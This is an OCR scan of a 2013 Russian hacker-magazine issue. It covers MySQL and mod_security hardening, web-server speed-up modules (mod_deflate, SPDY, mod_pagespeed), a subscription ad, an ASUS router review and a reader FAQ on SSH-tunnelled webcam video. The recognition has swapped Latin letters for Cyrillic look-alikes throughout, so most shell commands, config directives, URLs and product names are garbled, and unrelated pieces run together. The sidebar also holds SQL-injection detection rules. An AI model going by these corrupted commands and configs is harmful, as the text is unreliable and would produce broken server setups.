тах_іпри1:_Тіте = 30 
тетогу_1іті-С = 35М 



ЗАЩИЩАЕМ МУ501 



Неправильное конфигурирование веб-приложения или средств 
защиты может привести к тому, что хакер получает доступ к СУБД 
или незакрытому сетевому порту. Установки по умолчанию не всег- 
да подходят под конкретные условия и, возможно, небезопасны. 
Поэтому некоторое время следует уделить конфигурированию базы 
данных. Для примера возьмем МуБОІ. Первоначально следует 
определиться, нужна ли вообще мускулу сеть, так как если при- 
ложения общаются через сокет, то поддержку сети можно смело 
отключить. 

$ 5ис1о папо /еІс/туБдІ/ту.сп-Е 
5кір-пе1:могкіп§ 



МЕЖСЕТЕВОЙ ЭКРАН 
ДЛЯ ЗАЩИТЫ 
ВЕБ-ПРИЛОЖЕНИЙ 



Для защиты от основных типов атак, 
направленных на веб-приложения (Х55, 501 іп], 
05 Соттапсііпд и других), можно задействовать 
свободно распространяемый ^АР тоОесигііу 
( ѵѵѵѵѵѵ.тогібесигііѵ.ого і. 



• Настоятельно 
рекомендуется 
запускать АрасЬе 
в окружении 
сИгоои правами 
непривилеги- 
рованного 
пользователя. 

• ВРНР5.45а^е_ 
тоРе убран. 



# Пример защиты от 501 іп^ес^іоп 
5есРі11:ег "сіе1е1:е[[ :$расе: ]]-к-Ргот" 
ЗесРіІТег "зеІесТ.-ьРгот” 
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Евгений Зобнин (ехесЬі(.ги) 




ОБЗОР НАИБОЛЕЕ 
ПОЛЕЗНЫХ МОДУЛЕЙ 
ДЛЯ ВЕБ-СЕРВЕРОВ 
АРАСНЕ И Н6ІНХ 

Когда речь заходит об оптимизации веб-сайта, 
между программистами и администраторами 
нередко возникают конфликты. Процесс 
оптимизации должен включать в себя 
слаженную работу обеих команд, однако 
не всегда удается этого достичь. Поэтому 
особой популярностью всегда пользовались 
различные плагины к веб-серверам — чтобы 
можно было просто установить их и за пять 
минут получить меньшее время загрузки 
страницы. Но работают ли они? Попробуем 
выяснить. 



ВВЕДЕНИЕ 



В настоящее время Ореп Боигсе может предложить веб- 
разработчикам и администраторам три наиболее эффективных 
и технически обоснованных расширения для веб-серверов, спо- 
собных действительно существенно поднять производительность 
отдачи контента пользователю. 



Первое место среди них занимает проверенный временем 
и давно применяемый модуль глосі_(іе{Іа(е для веб-сервера АрасЬе, 
позволяющий прозрачно сжимать отдаваемый контент клиентам, 
поддерживающим сжатие, и таким образом более эффективно ис- 
пользовать канал передачи данных. Свои варианты такого модуля 
существуют для всех более-менее популярных серверов и исполь- 
зуются повсеместно. 

Совсем недавно компания боодіе выпустила также модуль 
то(і_5рсіу, реализующий придуманный ею же протокол 5Р0У — 
надстройку над НТТР. Изюминка 5Р0Ѵ в сжатии заголовков за- 
просов и ответов, что позволяет значительно повысить скорость 
отдачи контента или реагирования на события на сайтах, содержа- 
щих большое количество ресурсов или интенсивно использующих 
технологию А^АX. Одна только загвоздка — реализация протокола 
должна быть и на уровне клиента (например, боодіе СЬготе 6 
и выше), что существенно сужает область его применения. Да 
и полноценная реализация доступна только для АрасНе. 

Еще один плод работы программистов боодіе — это модуль 
тос1_раде5рееЬ, который вообще можно назвать Святым Граалем 
и спасением веб-программистов. Дело в том, что в его задачи 
входит множество различных преобразований данных, которые 
принято делать руками или с помощью специальных инструментов 
при каждом обновлении веб-сайта. Например, модуль может скле- 
ивать С55- и ^аѵа5сгір^файлы, проводя их оптимизацию и удаляя 
комментарии, умеет подгонять размер изображений под параме- 
тры, заданные в свойствах тега ІМб, производить сжатие изобра- 
жений, удалять лишние НТМІ-теги и многое другое. Все резуль- 
таты он благополучно кеширует на стороне сервера, не создавая 
особенного оверхеда. Не требует поддержки на стороне клиента, 
но доступен только для АрасЬе (хотя менее фичастый аналог есть 
и для пдіпх). 

Это три основных решения, которые можно использовать уже 
сегодня и о которых пойдет речь в этой статье. 



ОЕРІАТЕ 



Итак, ппосІ_сІеЛаІе. Старый добрый модуль, способный сжимать 
любые передаваемые данные с помощью алгоритма 1277. Под- 
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Приподнять потолок 



держивается абсолютно всеми популярными браузерами, в том 
числе ІЕ. Имеет очень широкую область применения и почти всегда 
включен на веб-сайтах. Особенно любим среди доморощенных 
веб-разработчиков и рекомендован ими же для обязательного 
использования. 

Причина этого в особой легкости применения фичи. Достаточно 
просто добавить в конфиг апача следующие строки — и вуаля, 
размер отдаваемых клиенту текстовых данных уменьшается 
на 70-90%: 

# ѵі И^^рсІ.соітР 

ЮасІМосІиІе сІеЯаТе_тосІи1е тосІи1е5/іпосІ_сІе0а1:е.5О 
<І-РМосІи1е тосІ_сІеЯа1:е.с> 

АсІсІОиІіриТРіІТегВуТуре ОЕРІАТЕ Тех-С/ИТтІ *-• 

■СехТ/рІаіп Тех1/хт1 ТехТ/с55 ТехТ/заѵазсгірТ 
</І-РМосІи1е> 

То же самое можно проделать и для отдельно взятого вирту- 
ального хоста при условии, что модуль будет загружен с помощью 
первой строки из приведенного выше конфига: 

# ѵі .И-(ассе55 

АсІсІОиТри-СРіІІіегВуТуре ОЕРІАТЕ Т:ех1:/Ы:т1 Техі/ріаіп ^ 
Іехі/хті -ЬехТ/сзБ 1:еx1:/^аѵа^сгір1 

Тем не менее при использовании тосі_сіеЛа(е следует учиты- 
вать несколько нюансов. Во-первых, на действительно нагру- 
женном сервере компрессия в режиме реального времени может 
создать больше проблем, чем решений. Ведь даже несмотря 
на смехотворную стоимость этой компрессии, при тысячах кли- 
ентов она может серьезно загрузить систему (именно поэтому 
на шаред-хостингах тос1_беЛа1е зачастую отключен). Во-вторых, 
нужно понимать, что действие тосі_сіеПаІе распространяется 
только на текстовые данные (изображения, а также другая графика 
и видео и так сжаты), поэтому не стоит ожидать от него какого-то 
существенного увеличения скорости загрузки страницы, равного 
уровню сжатия. 

Если же речь идет о веб-сервере пдіпх, то здесь есть аналогич- 
ный модуль с похожей функциональностью — пдх_д 2 Ір. Обычно 
он уже включен в пдіпх, позтому для активации достаточно доба- 
вить в секцию Нир конфига следующие строки: 

# ѵі /е-Ьс/п§іпх/п§іпх.соп^ 



егір 

82 Ір_тіп_ 1 еп§Т:И 


оп; 

1000; 


82ір_-1:уре5 


•Сех-С/рІаіп аррІіса-Сіоп/хтІ 
ТехТ/с55 ІіехТ/заѵазсгірТ; 


§2ір_сІі5аЫе 


"М5ІЕ [1-6]\."; 



Интересно, что в пдіпх есть и другой модуль — дгір_5ІаІіс, ко- 
торый не выполняет компрессию на лету, а берет уже сжатый файл 
с расширением дг и без всяких преобразований отправляет его 
клиенту. Плюс такого подхода в том, что он позволяет сэкономить 
добрую тысячу циклов процессора, но при этом требует пред- 
варительной подготовки сжатых версий файлов (что, в общем-то, 
нетрудно сделать с помощью простейшего скрипта). Активировать 
его также просто: 

# ѵі /е1с/п8Іпх/п8Іпх.соп-Р 
82Ір__5Іа-Сіс оп; 
е2ір_ІтС'Ср_ѵег5Іоп 1.1; 

82ір_сІі5аЫе "М5ІЕ [1-6]\."; 

Модуль не включен в стандартную поставку пдіпх, поэтому 
для его активации придется пересобрать веб-сервер: 



5Р0У 



Впервые боодіе представила протокол 5РОѴ (произносится «спи- 
ди») еще в конце 2009 года, описав его в блоге проекта СЬготіит. 
Тогда же была представлена его первая реализация в составе все 
того же браузера. Через полтора года боодіе объявила о повсе- 
местном внедрении протокола в свои веб-сервисы, а еще через год 
представила модуль для АрасЬе, позволяющий реализовать отдачу 
любого контента сайта средствами нового протокола. 

Что же такое 5Р0У и зачем он нужен? Как оказалось, это своего 
рода надстройка над НТТР, призванная решить его ключевые 
проблемы: порождение все новых ТСР-соединений для каждого 
запрашиваемого у сервера ресурса сайта, из-за чего возникают за- 
держки, и избыточность протокола, которая ведет к нерациональ- 
ному расходу пропускной способности канала. 

Для решения первой проблемы 5Р0У использует туннелиро- 
вание поверх 581, позволяя передавать сразу несколько потоков 
в рамках одного ТСР-соединения и избежать затрат времени 
на открытие новых ТСР-сессий. Вторая проблема решается за счет 
сжатия НТТР-заголовков, в результате чего объем передаваемых 
по сети данных существенно снижается, что особенно замет- 
но на интерактивных сайтах, использующих технологию А^АX, 
а также сайтах с множеством ресурсов, таких как изображения 
и внешние ^5-скрипты. 

Синтетические тесты, проведенные Гуглом еще во времена 
первых реализаций протокола, показали, что все это позволяет 
увеличить скорость работы сайтов в среднем на 55%. Реальные 
цифры после внедрения протокола в сервисы боодіе и тестиро- 
вания на клиентах, использующих браузер СНгоппе, оказались 
гораздо ниже, показав прирост в среднем на 15%, в некоторых слу- 
чаях он достигал 50%. Тем не менее это отличный способ за пять 
минут поднять производительность сайта для пользователей, чьи 
браузеры поддерживают 5РОУ, а это боодіе СЬготе, Еігеіох, Орега, 
браузер Апсігоісі и производные (то есть более чем половина всех 
клиентов). 

Модуль с официальной реализацией 5РОУ доступен для АрасЬе 
в виде прекомпилированного пакета, однако в связи с тем, что про- 
токол использует 551, сайт должен поддерживать НТТР5. Если это 
условие выполнено, достаточно только установить пакет и переза- 
пустить веб-сервер: 

$ ссі /Ттр 

$ м§еТ И1:1р://Ьі1:.1у/КмУЬ96 




Обработка соединения в потоке 



Обработчик 
соединений 
$РОѴ 




Обработка запроса в потоке 1 



Цепочка 

входного 

фильтра 



Обработ- 
чик НТТР 




Цепочка 
I фильтра 




входного 

іильтра 



Обработка запроса в потоке 2 



Обработ- 
чик НТТР 



Цепочка 

выходного 

фильтра 





Обработка запроса в потоке N 



Цепочка 
входного 
, фильтра 



И Обработ- 
чик НТТР 



Цепочка 




# ./сопбеиге --міТЬ-Ы:1:р_82Ір_5-СаТіс_тосІи1е 



Архитектура то(1_5р(1у 



ХАКЕР 02/169/2013 



135 






5УЫ/АСК 



$ зисіо сІрк§ -і тосі-зрсіу-* .сІеЬ 
$ зисіо ар1:-§е-1: --Р Іпз1:а11 
$ зисіо /е1:с/іпі1:.сІ/арасЬе2 гез-Ьаг-^ 

И это все. Теперь 5Р0Ѵ активирован для всех веб-сайтов, 
что легко проверить, открыв веб-сайт в браузере боодіе СЬготе 
и введя адрес сЬготе://пеЫп1егпа1з/#5рЬу в новой вкладке. Твой 
сайт должен присутствовать в приведенной таблице. Если это 
не так, следует проверить корректность конфигурации НТТР5. 
Также хочу обратить внимание, что 5Р0У выступает только в каче- 
стве опции, поэтому не поддерживающие протокол браузеры будут 
продолжать беспроблемно получать данные по протоколам НТТР/ 
НТТР5. 

С пдіпх ситуация сложнее. Компания боодіе не занималась 
портированием протокола в другие серверы, однако благодаря 
поддержке компании Аиіотаиіс для пдіпх уже ведется разработка 
серверной части этого протокола. Фактически реализация уже 
готова, однако она имеет ряд ограничений: не поддерживается 
технология Бегѵег РизЬ, невозможно лимитировать полосу про- 
пускания, кроме того, реализация компрессии заголовков уязвима 
для атак типа СРІМЕ. Во всем остальном реализация вполне при- 
годна для использования и даже уже применяется на некоторых 
веб-сайтах. 

На данном этапе развития реализация 5Р0У распространя- 
ется только в виде патча для пдіпх ветки 1.3. X, поэтому придется 
собрать и установить сервер из исходников. Для этого получаем 
исходники и патч с официальной страницы и собираем их с вклю- 
ченным модулем 551 (и любыми другими необходимыми модулями): 

$ ссі /1:тр 

$ м§е1 Ь-М:р://п§іпх.ог§/сІомп1оасІ/п§іпх-1.3.9Лаг.§2 
$ -Саг ХѴ-Р 2 П8іпх-І.3.9.-Саг.§2 
$ ССІ П8ІПХ-1.3.9 

$ м^еі: Іт^1р://п§іпх.ог8/ра'1:сИез/зрсІу/ра1:сЬ.зрсІуЛх1 
$ раІісН -р0 < раІісИ.зрсІу.-СхТ: 

$ ./сопб§иге --мі1:Ь-ІтІ:'1:р_зз1_тосІи1е 
$ таке 

$ зисіо таке іпзіаіі 

Все, что нужно сделать после этого, — это просто добавить 
аргументы ззі и зрсіу к директиве Іізіеп в секции зегѵег: 

# ѵі /е-Ьс/п§іпх/п8Іпх.соп-Р 

зегѵег { 

Ііз'Сеп 443 ЗЗІ зрсіу сІе-Раи1‘С_зегѵег; 

зз1_сег-СіЯса^е зегѵег. сг'С; 

зз1_сег-Сібса1:е_кеу зегѵег. кеу; 

} 

И перезапустить сервер: 

$ зисіо /еіс/іпііі.сі/пбіпх гезііагі: 

Как я уже говорил, на момент написания статьи реализация 
5Р0У для пдіпх страдала от уязвимости, из-за которой компрессия 
НТТР-заголовков по умолчанию была отключена. Чтобы исправить 
это, можно добавить в ту же секцию зегѵег такую строку (1 — уро- 
вень компрессии, допустимое значение от 1 до 9): 

зрсІу_ЬеасІегз_сотр 1 



РА6Е5РЕЕ0 



Совсем недавно компания боодіе анонсировала еще один модуль 
для «ленивых админов», которые хотят повысить производитель- 
ность своих веб-сайтов. Модуль получил название ппосі_раде5реесі 




Результат применения пдіпх * 5Р0У на сайте ЬиЬЫеісіеаз.сот 

( ѵу\л/\л/.то(іраоезрее(і.согл 1 и стал своего рода решением тех про- 
блем, которые можно выявить с помощью инструментов Раде5реес1 
у еІо рег5.дооаІе.сот/5реесі/ ра де5реесі ) . 

В список задач, решаемых этим модулем, входит большое 
количество (всего около сорока) оптимизаций веб-сайта, которые 
до этого времени приходилось проделывать вручную либо с по- 
мощью специальных скриптов. В частности, модуль делает такие 
вещи, как: 

• удаление комментариев в НТМ1-, С55- и Заѵа5сгір1-файлах; 

• удаление лишних пробелов между НТМІ-элементами с веб- 
страницы; 

• удаление лишнихатрибутовНТМІ-элементов; 

• слияние нескольких НТМІ-элементов НЕАО в один; 

• объединение нескольких С55- и Заѵа5сгір(-файлов в один; 

• оптимизация Заѵа5сгір1-кода; 

• внедрениесодержимого небольшихС55- и Заѵа5сгірІ-файлов 
в НТМЕ-код; 

• вынос больших блоков <5ІуІе> и <5сгір1> во внешние файлы; 

• внедрение кода, который откладывает исполнение Заѵабсгірі- 
кода до полной загрузки документа; 

• внедрение кода, который откладываетзагрузку изображений 
до того момента, пока страница не будет промотана до места их 
расположения; 

• увеличениесрока кеширования изображений; 

• генерация низкокачественных изображений, которые будут 
использованы, пока оригинальные изображения загрузятся 
браузером; 

• конвертирование изображений под размер, указанный в свой- 
ствахтегаІМб; 

• объединение изображений, используемых для фона, в одно боль- 
шое изображение (спрайт); 

• внедрение кода боодіе Апаіуіісз. 

Все это делается на лету в полностью автоматическом режиме 
и кешируется на стороне сервера. Оригинальные файлы при этом 
остаются нетронутыми, но при каждом их изменении оптимизиро- 
ванные версии будут сгенерированы снова. И самое замечательное 
во всем этом то, что, как и тос1_5рсіу, модуль радезреесі достаточно 
просто установить, без необходимости вносить какие-либо правки 
в конфигурационные файлы. То есть все, что нужно сделать, — это 
выполнить пять простых команд: 

$ ССІ /Ттр 

$ мбеТ Ы:1:р://Ьі1:.1у/КІлІ1сОу 
$ зисіо с1рк8 -і тос1-ра8е5реес1-*.с1еЬ 
$ зисіо арТ-ееТ -Т іпзТаІІ 
$ зисіо /е^с/іпі-С.сІ/арасЬе гезТагТ 

После этого сервер начнет отдавать оптимизированный 
контент. Никаких ручных оптимизаций, никаких скриптов, ни- 
каких «Я забыл сделать это». Все просто работает. Тем не менее 
для удобства и оценки влияния модуля на сайт можно внести 
несколько правок в конфиг, благодаря которым на сайте появятся 
две новые страницы (то(1_раде5реесІ_5ІаІІ5Ііс5 и тос1_раде5реес1_ 
теззаде) для слежения за статистикой и логами (доступны только 
локально): 
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Приподнять потолок 



Движок перезаписи ресурсов 



Серверный интерфейс 



Перезапись ресурсов 
с помощью фильтров 


Управление НТТР 
ресурсами 


фреймворк 


Кэширова- 


Обработ- 


Механизм 


обработки 


ние НТТР 


ка ияі 


оптими- 


и переза- 


и компрес- 


и рекон- 


зации 


писи 


сия за- 


арукция 


ресурсов 










5Т1 ІІЬрпд ІІЬІред ІІЬмеЬр гІІЬ ОрепСѴ ] 


СЬготіит 


РадеБрееО ІпвідМв 50К Соодіе С55 | 


Рагвег 










Кэш НТТР-контента 
Кэш метаданных 
Получение НТТР-контента 
Многопоточная система 
Журналирование 
Конфигурация 



Архитектура то(і_раде5рее(і 



$ бсІіеп'Ь СОПЙ6 1т1:Тр://тос1ра8е5реес1.§ооб1есос1е.сот/^ 
5ѵп/-1:гипк/5гс 

$ бсІіепТ 5упс ---Рогсе --зоЬ5=1 

Теперь необходимо собрать тос1_раде5реес1 и его библиоте- 
ку оптимизации, которая будет использована при сборке пдх_ 
радезреесі: 

$ сд ~/тос1_ра§е5реес1/5гс 
$ таке виіІОТѴРЕ=Ке1еа5е 
$ сд пеТ/іпзТамеЬ/аиТотаТіс 
$ таке а11 



# ѵі И-ЫрсІ.соп-Р 

<ІосаТіоп /тосІ_раее5реесІ_5Та1:і5-1:іс5> 

Огсіег а11ом,сІепу 
АІІоѵл/ -Ргот 1оса1Іі05І: 

А1ІОМ Тгот 127.0.0.1 
БеТНапсІІег тосІ_раее5реесІ_5І:а-1:і5Тіс5 
</ІосаТіоп> 

МосІРаеезреесІМеззаееВи-р-РегЗіге 100000 

< ІосаТіоп /тосІ_рабе5реесі_те55а8е> 

Огсіег а11ом,с1епу 
А1І0М -Ргот 1оса1Ьо5Т 
А1ІОМ -Ргот 127.0.0.1 
БеТНапсПег тосІ_ра§е5реесІ_те55а§е 
</ІосаТіоп> 

Стоит сказать, что по умолчанию тос1_раде5рееб использует 
только безопасные фильтры, которые не могут сломать работу 
сайта даже в теории. Тем не менее администратор вправе само- 
стоятельно указать фильтры, которые он хочет применить к своему 
веб-сайту. Чтобы сделать это, необходимо добавить в конфиг 
следующую строку: 



Последний этап. Сборка и установка пдіпх с модулем пдх_ 
радевреесі: 

$ ссі ~ 

$ §І1: сіопе Ы:-1:р5://§і-1:ЬиЬ.сот/ра8е$реесІ/4-« 

П8х_ра§е5реес1 . §11 

$ Іі1:-1:р://п8Іпх.ог8/аомп1оаа/п8іпх-1.2.6.-1:аг.82 

$ Ііаг -ХѴ2-Р П8іпх-1.2.6.1:аг.82 
$ ссі П8ІПХ-1.2.6/5ГС/ 

$ ./сопб^иге --міІН-сІеЬиб --асІсІ-тосІи1е=$НОМЕ/п8х_ра8е5реесІ 
$ таке Іп5і:а11 

Для активации модуля с безопасным набором фильтров помести 
в секцию ппаіп конфига следующие строки: 

# ѵі /еіс/пеіпх/пбіпх.сопТ 
рабезреесі оп; 

рабезреесі Кемгііеіеѵеі СогеРіІ^егз; 

ра§е5реесІ Рі1еСасИеРа1:Ь /ѵаг/п§х_ра 8 е 5 реесІ_сасІіе; 

Каталог /ѵаг/пдх_раде 2 реесі_сасЬе нужно создать и дать 
пользователю пдіпх права на запись в него. Далее в секцию зегѵег 
добавь такие строки, которые заставят сервер перенаправлять 
клиентов на кешированные ресурсы: 



МосІРабѲБреесІКемгііеІеѵеІ РаззТЬгоибЬ 

А затем указать нужные фильтры с помощью директивы 
МосіРадезреесІЕпаЫеРіІІегз. Полный список фильтров с описанием 
можно найти на странице Ьі^ѵ/^к9^^Ь . 

Для пдіпх компания боодіе, как всегда, модуль не выпустила, 
но на просторах интернета можно найти его аналог, развиваемый 
независимым разработчиком. Его надежность вызывает сомне- 
ние, однако он основан на оригинальном тосі_раде 5 реесІ и может 
выполнять ряд наиболее эффективных оптимизаций последнего, 
таких как оптимизация изображений, инлайнинг и оптимизация 
С55- и ^аѵа5сгір^файлов, отложенная загрузка изображений 
и ^аѵа5сгір^-кода, оптимизация НТМІ-кода. Зовется модуль пдх_ 
радезреесі, а найти его исходники можно на хостинге дііЬиЬ: аііЬиЬ. 
сот/р.а^^05д^/пд х раде ь реесі . Автор говорит о начальном состоя- 
нии разработки модуля, но никто не мешает его протестировать. 

Для этого тебе понадобятся исходники оригинального тос1_ 
радезреесі, а также утилита дсііепі, получить которую можно так: 

$ тксііг -р ~/Ьіп; ссІ ~/Ьіп 

$ зѵп со Ь1:1:р://$гс.сІіготіит.ог8/5Ѵп/1:гипк/1:ооІ5/«-> 
сІеро'1:_1:ооІ5 

$ ехрогі РАТН=$РАТН:~/Ьіп/сІеро1:_1:ооІ5 

Далее с ее помощью необходимо получить последний срез ис- 
ходников тос1_радезреесі из 5ѴМ: 

$ тксііг ~/тосІ_ра8е5реесІ 
$ ССІ ~/тос1_ра8е5реесІ 



# ѵі /еіс/п8Іпх/п§іпх.соп-Е 

Іосаііоп - "\.ра8езрееа\.[а-2]{2}\.['^.]{10}\.[''.]-ь" { } 
Іосаііоп ~ "''/П8х_ра8езреес1_5-1:а-1:іс/" { } 

Все. Можно перезапустить сервер: 

$ зисіо /е1:с/іпіі.сІ/п8іпх гезіагі 



ВЫВОДЫ 



«Волшебные» модули, которые позволяют оптимизировать веб- 
сайт, не потеряв его функциональность и стабильность, дей- 
ствительно работают и, как ты можешь видеть на скриншотах, 
позволяют получить существенный выигрыш в скорости загрузки. 
Использовать их или нет — решать тебе, однако вряд ли ты най- 
дешь более эффективный способ поднять производительность 
веб-сайта за десять минут, з: 



ІѴАѴаѵі 

• Страница проверки 
наличия сжатия 

на стороне сервера: 
ѵуѵ уѵу.ѵѵЬаізтуі р.ого/ 
ЬЦр-сотрге55Іоп-1е5І; 

• наглядная 
демонстрация 
увеличения 
скорости загрузки 
при использовании 
5РРУ: ЬЦр://ѵоиШ.Ье/ 
УЕ1ККЬЕТу4Д; 



• выигрыш в скорости 
загрузки страницы 
при использовании 
гпос1_раде5рее(1: Н»р:// 
у оиШ,Ье/8то6К2р^994; 

• индикатор активности 
5Р0Ѵ для Соодіе СЬготе: 
Ыиу/Це СЬ52: 

• индикатор активности 
5Р0Ѵ для Ріге!ох: ЬіІ.Іу/ 
ѴеаВІ. 



ІШД 

Протокол ЗРОѴ уже 
вошел в черновой 
вариант стандарта 
НТТР/2.0 и фактически 
является его основой. 
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166 рублей 
за номер! 

Нас часто спрашивают: «В чем преимущество подписки?» 

Во-первых, это выгодно. Потерявшие совесть распространи- 
тели не стесняются продавать журнал за 300 рублей и дороже. 
Во-вторых, это удобно. Не надо искать номер в продаже и бо- 
яться, что весьтиражуже разберут. В-третьих, это шанс полу- 
чить лицензию на один из продуктов компании Зутапіес! 





ПОДПИСКА 

6 месяцев 1110 р. 
12 месяцев 1999 р. 



Г 



ПОДАРОК 



В этот раз мы предлагаем в качестве подарка по 30 годо- 
вых лицензий на Ыогіоп Іпіегпеі Зесигку и Могіоп МоЬіІе 
Бесигііу среди первых 60 читателей, оформивших годовую 
подписку в периодсЗІ января по 20 февраля. 

Новая версия Могіоп ІпІегпеіБесигііу 
отличается более высоким уровнем 
безопасности, оптимизирована 
по скорости и производительности 
и очень проста в использовании. 
Среди новыхвозможностейгфункции 
защиты пользователя в социальных 
сетях, автоматическое обновление, 
удобство при работе с сенсорными 
экранами, более высокая скорость. 





Могіоп МоЬіІе Бесигііу — продукт 
обеспечиваетзащиту различных 
устройств, включая смартфоны 
и планшеты на Апсігоісі, атакже іРЬопе 
и іРасІ. Осуществляетрезервное 
копирование контактов, позволяет 
управлять защитой своихустройств 
онлайн, а также определить местопо- 
ложение вашего устройства в случае 
его потери. 




Ьир://5Ьор.дІс.ги 



ѴІ5А Ж ф ^ О 



8 (8001 200-3-999 (бесплатно) 
зиЬзсгіЬегадІс.гц 



НА ПРАВАХ РЕКЛАМЫ 



РЕКким 



Алексей Шуваев 



А$Ц5 

кт-Асми 

ГИГАБИТ ПО ВОЗДУХУ 
УЖЕ СЕГОДНЯ! 

Выбрав за основу некоторое время назад острые, точе- 
ные, манящие формы корпуса, компания А51І5 выпускает 
новую линейку топовых роутеров в схожем стиле. Но ин- 
тересный корпус устройства дополняется вполне серьез- 
ной начинкой. К нам попал топовый роутер с поддержкой 
нового стандарта связи 802.11ас, который может обеспе- 
чить скорость соединения более гигабита по воздуху! 




о начнем мы с внешнего осмотра 
девайса. Приятно, что роутер мини- 
атюрен, а если на столе уже элемен- 
тарно нет свободного места, то на этот случай 
в комплект поставки включена ножка, которая 
позволяет установить роутер вертикаль- 
но. Он от этого не только смотрится лучше, 
но и лучше охлаждается, так как вентиляци- 
онные отверстия у А51)5 РТ-АС661І находятся 
снизу и по бокам. Верхняя же крышка выпол- 
нена сплошной. Три антенны несимметричной 
формы дополняют образ. 

На задней панели расположено пять 
гигабитных ЕіЬегпеІ-портов, один из которых 
выделен для подключения к внешней сети, 
а четыре оставшихся — к локальной. Есть пара 
115В-портов, к которым можно подключить 
как внешний жесткий диск, так и периферию 
(МФУ, принтеры или сканеры) — при долж- 
ных настройках ими смогут пользоваться все 
в локальной сети. 

Что касается начинки, то тут все очень 
интересно. По сути, перед нами довольно про- 
изводительный компьютер со специфической 
задачей; гонять трафик и работать стабиль- 
но. Процессор ВСМ4706/ВСМ53003 работает 
на частоте 600 МГц, оперативной памяти целых 
256 Мб, ну а флеш-памяти для прошивки 
не пожалели и выделили целых 128 Мб, что по- 
зволяет надеяться на серьезное расширение 
функционала устройства. 



Что касается программной части, то и здесь 
все в полном порядке. К тому же прошивки 
выходят регулярно и некоторые недоработки 
«допиливаются». На момент написания статьи 
последней доступной прошивкой считалась 
версия под номером 3.0.0.4.220. 

Если же посмотреть меню, то оно практи- 
чески не изменилось за последний год и будет 
знакомо всем, кто сталкивался с роутерами 
АБУВ: удобное графическое меню с количе- 
ством подключенных устройств, просмотр гра- 
фиков загрузки интернет-канала или беспро- 
водной сети. Количество фильтров и настроек 
таково, что можно до мелочей распределить 
работу и отдых: запретить посещение не толь- 
ко конкретных сайтов, но даже содержащих 
ряд символов в УРІ или создать расписание 
доступа к сети, задавая рабочие интервалы 
для конкретного пользователя. Что касается 
скорости в 1300 Мбит/с по беспроводной сети, 
то здесь мы столкнулись с неприятной пробле- 
мой: роутеры с поддержкой стандарта 802.11ас 
уже есть в продаже, а адаптеров еще нет. 
Поэтому пришлось воспользоваться модулем 
^і-Рі с поддержкой стандарта ОгаЙМ. 

ВЫВОДЫ 

Роутер А5У5 РТ-АС66У определенно имеет 
серьезный потенциал и способен выполнять 
широкий спектр работ, включая работу в каче- 
стве сетевого накопителя или станции закачки 



торрентов, а текущая прошивка уже позволяет 
работать довольно комфортно. Он стаби- 
лен, а его функционал за счет постоянного 
обновления прошивок растет как на дрожжах. 
Осталось дождаться выхода полноценных бес- 
проводных модулей с поддержкой стандарта 
АС. И тогда вместе с А5У5 РТ-АС66У цель быть 
на пике прогресса будет достигнута. А посему 
этот роутер можно порекомендовать всем тем, 
кто охоч до стабильной и эффективной работы. 
В общем — всем. □□ 



* Высокая пропускная способность 

* Высокая функциональность 

+ Работа в двух диапазонах и создание гостевых 
беспроводных сетей 




Поддержка стандартов: 802.1 1а/Ь/д/п/ас 

Антенна: 3 х съемные 

Рабочие частоты: 2,4-2,4835 / 5,1-5, 8 ГГц 

Шифрование: 64-ЬіІ ѴѴЕР, 128-ЬіІ ѴѴЕР, ѴѴРА2-Р5К, 

ѴѴРА-Р5К, ѴѴРА-Еп1егргі$е, ѴѴРА2-ЕпІегргІ5е 

Сетевые возможности: ЦРпР, ^^NА, 0Ы5 Ргоху, 

МТР СІіепІ, ^^N5, РоП Тгідег, Ѵігіиаі Бегѵег, ОМ2 

ѴРЫ сервер: РРТР 

Гостевые сети: 3 * 2,4 ГГц, 3 х 5 ГГц 

Порты: 1 X РЗ-45 Ьг 10/100/1000 ВавеТ Іог 1Л/АМ, 4 х 

РЗ-45 ІОГ 10/100/1000 ВавеТ Іог САМ. 2 х УБВ 2.0 

Габариты: 207 х 149 х 36 мм 

Вес: 450 г 
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Роман Гоций (до(5І]готап0дтаіІ.сот) 



РАО 

ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РАО(аПЕАС.ХАКЕР.Ри 



□ Время от времени нужно посмотреть 
через веб-камеру, что творится дома :). 
Смотреть планирую с разных компьютеров, 
поэтому хочу быть уверенным в безопасности 
передаваемого видео. Для этого на домашнем 
ПК поднял $5Н-сервер, доступный из мира. 
Собственно, вопрос: как смотреть видео 
с камеры через 5БН, не используя при этом X 
Рогѵѵагсііпд? 

□ В данном случае удобнее всего 

туннелировать видеопоток, используя 
для захвата видео ѴІС ( ѵѵѵѵѵѵ.ѵісіеоіап.огд/ѵіс і. 
На домашнем компьютере установи ѴСС, затем 
проделай следующие действия. 

1. Подключись к домашнему $5Н-серверу: 



$ 55Ь и5ег@[НотеРС] -I 9091 :«-• 
1оса1Ио5'С:9091 



или, если используешь РиТТУ, перед 
подключениемустанови в Соппесііоп -» 
$5Н->ТиппеІ5 значение Зоигсерогі в 9091, 
а Оезііпаііоп — ІосаІЬо5І:9091 и нажми 
накнопку«Абб». 

2. Кактолькоподключишься ксвоемукомпью- 
теру, выполни следующую команду (удобнее 
всего создать скрипт с этой командой и вы- 
полнятьужеего): 



$ ѴІС ѵ412:// :ѵ412-сІеѵ=/сІеѵ/ѵісІео0 
:ѵ4І2-асІеѵ=/сІеѵ/сІ5р :5ои1:=*-' 
"#1:гап5сосІе{ѵсос1ес=тр4ѵ, ѵЬ=800, 
5са1е=1,асосІес=тр8а,аЬ=128, 
сИаппе1$=2} :сІир1іса-Се{сІ5'С=5-СсІ4-і 
{ассе55=И‘С‘Ср,тих=1:5,сІ5'С=«-' 
1оса1Ііо5І::9091}}" 

3. Запусти на компьютере, с которым работа- 
ешь в данный момент, любую программу, 
способную воспроизводитьсетевые видео- 
потоки, и введи адрес: ЬПр://ІосаІЬо5І:9091. 

Мой 36-модем корректно работает 
через КЫеІѵѵогкМападег, но я не могу 
просматривать СМС и, что печальнее, 
выполнять У550-запросы: ни счет пополнить, 
ни пакет данных заказать. В инете нашел 
разные скрипты, но это не очень удобно 
для меня. Можешь что-то порекомендовать? 
Для решения твоей проблемы можно 
использовать программу Мобет 
тападег бІЛ, которая должна быть доступна 
в стандартных репозиториях. Если же ее там 
нет, то придется добавлять РРА: 

# асІсІ-ар'С-герозі'Согу «-« 

рра : 1іпихоп1у/тосІет+тапа§ег+8иі 




□ 



# ар1:-§е'С ирсІа'Се 

# арі-ееі: іп5І:а11 тосіет-тапаеег-еиі 

